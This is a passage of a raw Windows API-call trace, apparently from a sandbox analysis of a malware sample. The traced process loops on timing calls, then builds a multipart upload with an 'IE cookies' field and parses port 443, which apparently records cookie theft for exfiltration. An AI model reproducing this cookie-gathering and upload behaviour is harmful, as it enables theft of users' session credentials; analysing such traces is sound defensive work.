(hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.580] GetProcessHeap () returned 0x5f0000 [0181.580] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.580] Sleep (dwMilliseconds=0xf) [0181.612] GetProcessHeap () returned 0x5f0000 [0181.612] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.612] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.612] GetProcessHeap () returned 0x5f0000 [0181.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.612] GetTickCount () returned 0xe96e7b [0181.613] GetProcessHeap () returned 0x5f0000 [0181.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f560 [0181.613] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.613] GetProcessHeap () returned 0x5f0000 [0181.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.613] Sleep (dwMilliseconds=0x12) [0181.642] GetProcessHeap () returned 0x5f0000 [0181.642] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.642] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.642] GetProcessHeap () returned 0x5f0000 [0181.642] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.642] GetTickCount () returned 0xe96e9b [0181.642] GetProcessHeap () returned 0x5f0000 [0181.643] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f560 [0181.643] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.643] GetProcessHeap () returned 0x5f0000 [0181.643] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.643] Sleep (dwMilliseconds=0x15) [0181.679] GetProcessHeap () returned 0x5f0000 [0181.679] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f5b0 [0181.680] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.680] GetProcessHeap () returned 0x5f0000 [0181.680] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.680] GetTickCount () returned 0xe96eba [0181.680] GetProcessHeap () returned 0x5f0000 [0181.680] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f4a0 [0181.680] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.680] GetProcessHeap () returned 0x5f0000 [0181.680] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.680] Sleep (dwMilliseconds=0x18) [0181.718] GetProcessHeap () returned 0x5f0000 [0181.718] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f630 [0181.718] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.718] GetProcessHeap () returned 0x5f0000 [0181.718] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.718] GetTickCount () returned 0xe96ed9 [0181.718] GetProcessHeap () returned 0x5f0000 [0181.718] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f630 [0181.718] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.718] GetProcessHeap () returned 0x5f0000 [0181.718] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.719] Sleep (dwMilliseconds=0x1b) [0181.760] GetProcessHeap () returned 0x5f0000 [0181.761] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.761] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.761] GetProcessHeap () returned 0x5f0000 [0181.761] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.761] GetTickCount () returned 0xe96f18 [0181.761] GetProcessHeap () returned 0x5f0000 [0181.761] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f580 [0181.761] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.761] GetProcessHeap () returned 0x5f0000 [0181.761] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.762] Sleep (dwMilliseconds=0x1e) [0181.794] GetProcessHeap () returned 0x5f0000 [0181.794] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f580 [0181.795] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.795] GetProcessHeap () returned 0x5f0000 [0181.795] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.795] GetTickCount () returned 0xe96f37 [0181.795] GetProcessHeap () returned 0x5f0000 [0181.795] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f4a0 [0181.795] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.795] GetProcessHeap () returned 0x5f0000 [0181.795] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.796] Sleep (dwMilliseconds=0x21) [0181.843] GetProcessHeap () returned 0x5f0000 [0181.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.843] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.843] GetProcessHeap () returned 0x5f0000 [0181.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.843] GetTickCount () returned 0xe96f66 [0181.843] GetProcessHeap () returned 0x5f0000 [0181.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f580 [0181.844] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.844] GetProcessHeap () returned 0x5f0000 [0181.844] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.844] Sleep (dwMilliseconds=0x24) [0181.896] GetProcessHeap () returned 0x5f0000 [0181.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f5b0 [0181.897] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.897] GetProcessHeap () returned 0x5f0000 [0181.897] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.897] GetTickCount () returned 0xe96f95 [0181.897] GetProcessHeap () returned 0x5f0000 [0181.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f4a0 [0181.898] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.898] GetProcessHeap () returned 0x5f0000 [0181.898] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.898] Sleep (dwMilliseconds=0x27) [0181.944] GetProcessHeap () returned 0x5f0000 [0181.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f540 [0181.944] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.944] GetProcessHeap () returned 0x5f0000 [0181.944] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.944] GetTickCount () returned 0xe96fc4 [0181.944] GetProcessHeap () returned 0x5f0000 [0181.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f630 [0181.945] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.945] GetProcessHeap () returned 0x5f0000 [0181.945] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.945] Sleep (dwMilliseconds=0x2a) [0181.994] GetProcessHeap () returned 0x5f0000 [0181.994] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f4a0 [0181.995] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.995] GetProcessHeap () returned 0x5f0000 [0181.995] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.995] GetTickCount () returned 0xe97002 [0181.995] GetProcessHeap () returned 0x5f0000 [0181.995] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f630 [0181.995] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.995] GetProcessHeap () returned 0x5f0000 [0181.995] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.995] Sleep (dwMilliseconds=0x2d) [0182.042] lstrlenA (lpString="MTJCASJUDXRSUQEV") returned 16 [0182.042] GetProcessHeap () returned 0x5f0000 [0182.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x6362a0 [0182.042] lstrcpyA (in: lpString1=0x6362a0, lpString2="MTJCASJUDXRSUQEV" | out: lpString1="MTJCASJUDXRSUQEV") returned="MTJCASJUDXRSUQEV" [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f580 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f4a0 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f4a0, Size=0x33) returned 0x6355d0 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6362a0 | out: hHeap=0x5f0000) returned 1 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0182.043] lstrlenA (lpString="\r\n") returned 2 [0182.043] GetProcessHeap () returned 0x5f0000 [0182.043] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f540 [0182.043] lstrcpyA (in: lpString1=0x61f540, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613920 [0182.044] lstrlenA (lpString="--") returned 2 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f630 [0182.044] lstrcpyA (in: lpString1=0x61f630, lpString2="--" | out: lpString1="--") returned="--" [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f550 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f550, Size=0x37) returned 0x6352d0 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c) returned 0x636300 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636300, Size=0x3b) returned 0x635210 [0182.044] GetProcessHeap () returned 0x5f0000 [0182.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1e) returned 0x6363a0 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x87) returned 0x61c9d0 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635210 | out: hHeap=0x5f0000) returned 1 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6352d0 | out: hHeap=0x5f0000) returned 1 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613920 | out: hHeap=0x5f0000) returned 1 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0182.045] lstrlenA (lpString="IE cookies") returned 10 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f540 [0182.045] lstrcpyA (in: lpString1=0x61f540, lpString2="IE cookies" | out: lpString1="IE cookies") returned="IE cookies" [0182.045] lstrlenA (lpString="\"\r\n\r\n") returned 5 [0182.045] GetProcessHeap () returned 0x5f0000 [0182.045] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f5c0 [0182.045] lstrcpyA (in: lpString1=0x61f5c0, lpString2="\"\r\n\r\n" | out: lpString1="\"\r\n\r\n") returned="\"\r\n\r\n" [0182.046] lstrlenA (lpString="\r\n") returned 2 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f560 [0182.046] lstrcpyA (in: lpString1=0x61f560, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0182.046] lstrlenA (lpString="\"\r\n\r\n") returned 5 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f4a0 [0182.046] lstrcpyA (in: lpString1=0x61f4a0, lpString2="\"\r\n\r\n" | out: lpString1="\"\r\n\r\n") returned="\"\r\n\r\n" [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x61f550 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30a) returned 0x628380 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f630 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x44) returned 0x620230 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620230, Size=0x8f) returned 0x61c820 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x620820 [0182.046] GetProcessHeap () returned 0x5f0000 [0182.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0x99) returned 0x611f60 [0182.047] GetProcessHeap () returned 0x5f0000 [0182.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x620550 [0182.047] GetProcessHeap () returned 0x5f0000 [0182.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x6ab) returned 0x6286a0 [0182.047] GetProcessHeap () returned 0x5f0000 [0182.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x356) returned 0x628d60 [0182.047] GetProcessHeap () returned 0x5f0000 [0182.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x628d60, Size=0x6af) returned 0x6290d0 [0182.047] GetProcessHeap () returned 0x5f0000 [0182.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x358) returned 0x628d60 [0182.048] GetProcessHeap () returned 0x5f0000 [0182.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x628d60, Size=0x735) returned 0x629790 [0182.048] GetProcessHeap () returned 0x5f0000 [0182.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x39b) returned 0x629ee0 [0182.048] GetProcessHeap () returned 0x5f0000 [0182.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x629ee0, Size=0x741) returned 0x62a290 [0182.048] GetProcessHeap () returned 0x5f0000 [0182.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3a1) returned 0x62a9f0 [0182.048] GetProcessHeap () returned 0x5f0000 [0182.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a9f0, Size=0x74b) returned 0x62adb0 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3a6) returned 0x62a9f0 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a9f0, Size=0x75f) returned 0x62b510 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x75f) returned 0x62bc80 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62b510 | out: hHeap=0x5f0000) returned 1 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62adb0 | out: hHeap=0x5f0000) returned 1 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a290 | out: hHeap=0x5f0000) returned 1 [0182.049] GetProcessHeap () returned 0x5f0000 [0182.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x629790 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6290d0 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6286a0 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c820 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x628380 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0182.050] GetProcessHeap () returned 0x5f0000 [0182.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f630 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f520 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f640 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0x3b) returned 0x635410 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1e) returned 0x636300 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636300, Size=0x43) returned 0x620050 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620050 | out: hHeap=0x5f0000) returned 1 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635410 | out: hHeap=0x5f0000) returned 1 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f630 [0182.051] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5b0 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f640 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f540 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f4a0 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f560 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x6361e0 [0182.052] GetProcessHeap () returned 0x5f0000 [0182.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x55) returned 0x618b30 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f550 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.058] lstrlenA (lpString="/") returned 1 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f550 [0182.058] lstrcpyA (in: lpString1=0x61f550, lpString2="/" | out: lpString1="/") returned="/" [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.058] lstrlenA (lpString=":") returned 1 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f550 [0182.058] lstrcpyA (in: lpString1=0x61f550, lpString2=":" | out: lpString1=":") returned=":" [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f550 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f5c0 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f550 [0182.058] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToIntExA") returned 0x7ffb262f5d10 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0182.058] StrToIntExA (in: pszString="443", dwFlags=0x0, piRet=0x5ce7b0 | out: piRet=0x5ce7b0) returned 1 [0182.058] GetProcessHeap () returned 0x5f0000 [0182.058] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f550 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5c0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f850 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f840 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f800 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f6a0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f7c0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f6e0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f7f0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f7b0 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f550, Size=0xd) returned 0x61f810 